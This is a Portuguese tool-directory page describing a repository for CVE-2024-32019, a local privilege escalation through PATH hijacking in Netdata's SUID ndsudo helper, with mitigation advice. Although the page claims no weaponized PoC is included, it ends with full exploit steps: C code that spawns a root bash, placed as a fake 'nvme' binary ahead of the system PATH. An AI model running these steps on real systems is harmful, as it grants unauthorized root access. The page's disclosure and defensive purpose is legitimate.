Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-32019-PoC — Verifica a exposição à escalada de privilégios do SUID PATH do Netdata ndsudo para CVE-2024-32019 e valida patches sem exploração weaponizada. | Kitploit
Ferramentas/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Ferramentas DefensivasEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoVirtualização para SegurançaTestes de Penetração
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Verifica a exposição à escalada de privilégios do SUID PATH do Netdata ndsudo para CVE-2024-32019 e valida patches sem exploração weaponizada.

Ver Repositório
19há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32019 — Escalação de Privilégios Local no ndsudo do Netdata

Resumo

O helper ndsudo do Netdata (instalado com setuid root) restringe quais comandos irá executar, mas resolve esses comandos usando o PATH do chamador. Em versões afetadas, um usuário local pode colocar um binário malicioso no início do PATH e fazer com que o ndsudo o execute com privilégios de root. Corrigido no Netdata 1.45.3 e 1.45.0-169.

Afetado / Corrigido

  • Afetado: >= 1.44.0-60, < 1.45.0-169 e >= 1.45.0, < 1.45.3 (conforme o aviso upstream).

  • Corrigido: 1.45.3 (estável), 1.45.0-169 (nightly). GitHub

Impacto

Escalação de privilégios local para root em sistemas onde o ndsudo está instalado com SUID e o usuário pode invocá-lo (comumente membros do grupo netdata). NVDGitHub

Causa Raiz (visão geral)

  • O ndsudo é SUID-root e permite uma lista de subcomandos como nvme-list, nvme-smart-log, etc.

  • Ele chama executáveis externos pelo nome (por exemplo, nvme), que são resolvidos via PATH em vez de usar caminhos absolutos ou uma busca segura e fixa.

  • Se um diretório gravável aparecer antes dos caminhos do sistema, um atacante pode introduzir um binário semelhante que será executado como root. GitHub

Reprodução / Verificação Segura

Este repositório inclui verificadores não-exploit que:

  • Inspecionam /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (ou onde estiver instalado) quanto a SUID/propriedade.

  • Enumeram o PATH em busca de diretórios graváveis anteriores aos caminhos comuns do sistema.

  • Confirmam a presença de nomes de subcomandos permitidos que o ndsudo pode tentar executar.

  • Opcionalmente executam ndsudo --test <subcommand> para imprimir o comando resolvido sem executá-lo (use com cautela, leia o código primeiro). GitHub

⚠️ Nenhum PoC weaponizado está incluído. Este projeto é para defensores e pesquisadores avaliarem a exposição e validarem patches de forma responsável.

Mitigação

  • Atualize o Netdata para 1.45.3 (estável) ou 1.45.0-169 (nightly).

  • Como medida de defesa em profundidade, prefira caminhos absolutos ou um PATH mínimo sanitizado em helpers SUID; evite conceder acesso desnecessário ao ndsudo. GitHubwiz.io

Passos do Exploit

1. Salve o seguinte código C como nvme.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compile o Exploit
gcc nvme.c - nvme
3. Configuração do Ambiente
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modifique o PATH
export PATH=/tmp/fakebin:$PATH
5. Comando do Exploit
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Referências

  • NVD: CVE-2024-32019. NVD

  • Aviso do Netdata (GHSA-pmhq-4cxq-wj93). GitHub

  • Resumo da Wiz. wiz.io

  • Artigo da Snyk. Vulnerability Guide

  • Listagem MITRE/CVE. CVE

Baixar ferramenta